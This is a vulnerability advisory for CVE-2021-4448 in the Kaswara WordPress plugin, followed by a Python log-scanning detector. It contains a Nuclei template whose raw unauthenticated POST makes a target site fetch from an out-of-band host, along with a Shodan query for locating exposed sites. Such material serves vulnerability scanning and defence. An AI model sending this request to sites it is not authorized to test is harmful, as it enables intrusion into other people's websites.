The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.
PoC code [public]
id: CVE-2021-4448

info:
  name: Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization
  author: daffainfo
  severity: high
  description: |
    The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.
  impact: |
    Unauthenticated attackers can perform unauthorized actions including file uploads, deletions, and data import, potentially leading to site compromise.
  remediation: |
    Deactivate and delete the plugin from the server
  reference:
    - https://codecanyon.net/item/kaswara-modern-visual-composer-addons/19341477
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kaswara/kaswara-modern-vc-addons-301-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-4448
    epss-score: 0.43626
    epss-percentile: 0.97394
    cwe-id: CWE-862
    cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kaswara_project
    product: kaswara
    framework: wordpress
    shodan-query: html:"kaswara"
  tags: cve,cve2021,wp,wordpress,wp-plugin,kaswara,oast,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaswaraImportDemo&contentUrl=http://{{interactsh-url}}/

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'missing/invalid WXR version number'

      - type: word
        part: interactsh_protocol
        words:
          - 'http'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022078e0b4343c25a0718ab930c56640fc9f6b59a6221647c7837e9eca4105cf4279022100c669f065d6bcf568cf22ef0f585d619367e6eb42efc39bc1e5b3dc506bae047c:922c64590222798bb761d5b6d8e72950
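As an added detection example (not part of the advisory or of the plugin's code): a small Python scan that flags unauthenticated calls to the plugin's AJAX actions in request logs, the pattern the template above probes for. It assumes a constructed JSON-lines log format in which a reverse proxy or WAF records the POST body and Cookie header, since stock web-server access logs do not contain the action parameter; the hook name kaswaraImportDemo comes from the template, while the matched prefix, the field names and the sample addresses are assumptions.

```python
import json
from typing import Optional
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION_PREFIX = "kaswara"  # assumed: the plugin's AJAX hooks share this prefix, e.g. kaswaraImportDemo

def is_logged_in(cookie_header: str) -> bool:
    """WordPress marks authenticated sessions with a wordpress_logged_in_<hash> cookie."""
    return any(c.strip().startswith("wordpress_logged_in_") for c in cookie_header.split(";"))

def analyse(entry: dict) -> Optional[dict]:
    """Return a finding for an unauthenticated call to a Kaswara AJAX action, else None."""
    if entry.get("method") != "POST" or urlsplit(entry.get("uri", "")).path != AJAX_PATH:
        return None
    params = parse_qs(entry.get("body", ""))
    action = params.get("action", [""])[0]
    if not action.startswith(ACTION_PREFIX) or is_logged_in(entry.get("cookie", "")):
        return None  # unrelated action, or an authenticated caller (out of scope here)
    finding = {"src": entry.get("src"), "action": action, "status": entry.get("status")}
    url = params.get("contentUrl", [""])[0]
    if url:  # the importer fetches this URL, so its host is the caller-chosen fetch target
        finding["fetch_host"] = urlsplit(url).hostname
    return finding

def scan(lines) -> list:
    """Run analyse() over JSON-lines log records (constructed format) and collect findings."""
    findings = []
    for line in lines:
        if line.strip():
            found = analyse(json.loads(line))
            if found:
                findings.append(found)
    return findings

# Constructed sample log: one unauthenticated import call, one by a logged-in admin,
# one unrelated AJAX action and one non-AJAX request.
SAMPLE_LOG = """
{"src": "203.0.113.7", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "status": 200, "cookie": "", "body": "action=kaswaraImportDemo&contentUrl=http://oast.example/"}
{"src": "198.51.100.4", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "status": 200, "cookie": "wordpress_logged_in_ab12=admin%7C1700000000; wp-settings-1=x", "body": "action=kaswaraImportDemo&contentUrl=https://cdn.example/demo.xml"}
{"src": "203.0.113.7", "method": "POST", "uri": "/wp-admin/admin-ajax.php", "status": 200, "cookie": "", "body": "action=heartbeat&_nonce=1234"}
{"src": "203.0.113.9", "method": "GET", "uri": "/?p=1", "status": 200, "cookie": "", "body": ""}
"""

def demo() -> list:
    return scan(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Only the first record is reported: the admin's call carries a login cookie and the other two requests never reach a Kaswara action.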